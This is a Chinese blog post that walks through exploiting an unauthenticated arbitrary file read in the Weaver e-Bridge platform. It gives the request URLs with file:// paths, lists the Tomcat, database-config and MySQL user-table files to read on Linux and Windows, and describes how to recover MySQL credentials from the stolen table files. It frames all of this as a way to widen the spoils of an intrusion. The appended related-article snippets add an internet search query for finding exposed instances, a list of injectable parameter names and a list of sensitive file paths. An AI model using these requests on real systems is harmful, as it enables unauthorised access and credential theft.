配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)

最新推荐文章于 2024-08-02 11:57:55 发布
最新推荐文章于 2024-08-02 11:57:55 发布
阅读量1.9k 收藏
点赞数 1
文章标签: 配置文件读取绝对路径
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42502643/article/details/113453353
版权
本文介绍了泛微ebridge系统中存在未授权的任意文件读取漏洞,通过接口可以获取程序绝对路径,进而读取敏感文件,如数据库配置、密码文件等。在Linux和Windows环境下,利用方法有所不同,展示了如何利用此漏洞获取tomcat配置、数据库凭证,并在Linux环境中重置MySQL密码。文章强调了渗透测试中发散思维的重要性。
摘要由CSDN通过智能技术生成

bff96b7084581ed613ee162459353d26.png

漏洞简介

         未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件。

         目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志等。

漏洞利用

Linux

先获取e-bridge的安装路径

# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt

842cf00fe03f898af37c390c174bfb49.png

# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ewechat/&fileExt=txt

2be78486be19434617fb1bc947937d97.png

找到了当前目录,现在即可组合文件读取进行漏洞利用最大化。

tomcat-users.xml (tomcat配置文件)

# path/usr/ewechat/tomcat/conf/tomcat-users.xml

bbed4ef5389c6b7e93b0c146590a1603.png

init.properties (数据库配置文件)

# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/init.properties

bb77c41a0b2f5ef9496eb86f3baa5a70.png

sqlserverconfig.properties (mssql用户名密码)

# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.properties

c5192fea37d1da2c57f19e3f5c683080.png

user.MYD (mysql)

# path/usr/ewechat/mysql/data/mysql/user.MYD

484088e4db1da46b2ee2a51da2089c08.png

下载mysql的user.MYD文件

记事本打开可以直接查看到密码的MD5值9f9b44dd94da1104cedfca99b6bacbdf.png

user.frm user.MYD user.MYI (mysql)

# path/usr/ewechat/mysql/data/mysql/user.MYD/usr/ewechat/mysql/data/mysql/user.MYI/usr/ewechat/mysql/data/mysql/user.frm

  • 自行搭建环境

  • 下载user.frm user.MYD user.MYI这三个文件到本地替换

  • 输入mysqld --skip-grant-tables 回车。--skip-grant-tables 的意思是启动MySQL服务的时候跳过权限表认证。

  • 连接数据库查询

Windows

先获取e-bridge的安装路径f7522182a34c6029d80729588c69a584.png

init.properties (数据库配置文件)

# pathd://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties

c9d9b201b83b740563232f2e7a324329.png

e-bridge的相对路径是一样的,所以在win环境下,可根据以上Linux环境下的路径直接构造想要读取的文件路径:

# pathd:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.propertiesd:/ebridge/tomcat/conf/tomcat-users.xmld:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.propertiesd:/ebridge/mysql/data/mysql/user.MYD...

### 分割线

这篇文章只是一种渗透思路的体现,不管是xss还是rce,其漏洞带来的影响都需要去被发散思维/最大化利用,以便将战果尽可能地扩大c6ee1d61f4072315c6ff92090e51db7a.png

KyrieXu11
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1275
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
泛微云桥e-Bridge任意文件读取
MD@@nr丫卡uer
11-28 3918
泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title=“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件 构造如下语句 http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/
任意文件读取/下载漏洞
qq_68163788的博客
05-23 2656
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
任意文件读取路径、字段和payload
爱上卿的博客
08-07 3125
敏感字段 &RealPath= &FilePath= &filepath= &Path= &path= &inputFile= &url= &urls= &Lang= &dis= &data= &readfile= &filep= &src= &menu= META-
【漏洞复现】泛微 E-Weaver ProcessOverRequestByXml 任意文件读取漏洞
https://blog.echo234.cn/
03-31 809
泛微E-Weaver旨在帮助企业实现信息化管理、业务协同和数字化转型。该平台提供了一系列的功能模块,包括企业门户、流程管理、文档管理、知识管理、协同办公、人力资源管理、客户关系管理等。这些模块可以根据企业的实际需求进行定制和配置,以满足不同行业和组织的特定需求。泛微 E-Weaver ProcessOverRequestByXml存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微e9前端接口api_泛微E8相关文档
09-21
在“E9流程表单前端接口API(V23).pdf”这个文件中,我们可以期待找到关于如何使用泛微e9系统中流程表单功能的详细接口规范。 1. **接口API的基础概念**:API,全称Application Programming Interface,是软件之间...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
Excel复制进入详细表_oa系统_Excel复制进入详细表_泛微OA_
10-02
在企业信息化管理中,OA(Office Automation)系统扮演着至关重要的角色,泛微OA作为一款知名的办公自动化系统,提供了一系列高效、便捷的功能。"Excel复制进入详细表"是泛微OA系统中的一个特色功能,它使得数据管理...
任意文件读取
qq_45953122的博客
08-31 1119
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件配置文件,敏感文件等等。
js读取properties文件
08-18
js读取properties文件,很好用的。js读取properties文件,很好用的。js读取properties文件,很好用的。js读取properties文件,很好用的。
任意文件下载(读取)
星落的博客
08-29 4598
漏洞简介:一些网站由于业务需求,往往需要提供文件查看或下载功能。一般来说在文件下载或查看功能处,当文件名参数可控,且系统未对参数进行严格过滤或者过滤不严格时,就能够实现下载服务器上的任何文件,产生任意文件下载漏洞,黑客可以利用( ../ )跳出程序本身的限制目录实现下载任意文件。...
泛微接口文件读取配置文件的值
余大冠子的博客
09-29 1692
一般对接其他系统的时候,总有测试地址,正式地址。如果直接写在接口中,总会涉及到服务重启和代码安全性的问题。出于这些问题我们把固定的某些参数写入配置文件中xxx.properties,文件后缀名一定为properties,文件名自定义。写入配置文件中参数,后期代码有变动,只需改配置文件中的参数,无需重启也安全。配置文件的存放路径为:/weaver/ecology/WEB-INF/prop 需要引用系统的weaver.general.BaseBean类 BaseBean baseBean = new Ba
2021-08-06 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(Ruby版)
热门推荐
时光隧道
08-06 4万+
漏洞一:Ruby On Rails框架任意文件读取漏洞; 1:…/…/…/…/…/…/etc/passwd可以进行文件跳跃 上图使用了Base64编码跳跃模式 漏洞二:Rails cookies反序列化 使用metasploit中相应的Ruby反序列化攻击模块直接攻击。 服务端反序列化时,就会触发漏洞执行恶意代码 ...
2021-08-16 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(Docker版)
时光隧道
08-16 4万+
漏洞一:JavaScript对象污染;axios SSRF(UNIX Socket)攻击Docker API读取本地文件 ①拉取轻量级镜像docker pull alpine:latest=>: ②创建容器docker create-v/flag:/flagindocker alpine–entrypoint “/bin/sh”–name ctfalpine:latest=>: 启动容器docker start ctf: 读取Docker的文件archive: ...
任意文件读取常用读取文件名(Windows&Linux)
最新发布
2301_77344663的博客
08-02 435
proc/[PID]/fd/[#] // 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log。/proc/net/tcp and /proc/net/udp // 活动连接的信息。/opt/nginx/conf/nginx.conf //nginx的配置文件。/etc/httpd/conf/httpd.conf //httpd的配置文件。/proc/[PID]/cwd // 当前进程的工作目录。
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7565
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
泛微文档存放在服务器哪个地址,泛微OA根据文档的docid查询文档附件存放的路径...
weixin_29430629的博客
08-09 1985
注意看下面两个链接http://127.0.0.1/docs/docs/DocDspExt.jsp?id=40369http://127.0.0.1/docs/docs/DocDsp.jsp?id=41353DocDspExt.jsp地址的文档才会把附件存放到/WEAVER/ecology/filesystem目录下。DocDsp.jsp地址的文档是网页形式的文档,直接插入到数据库,没有附件存放到...
泛微 e-cology9 filedownload.jsp 任意文件读取
11-24
泛微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修复。 修复这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发现和处理类似问题,减少潜在的安全隐患。 总的来说,泛微 e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修复和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修复工作,以确保企业信息系统的安全稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值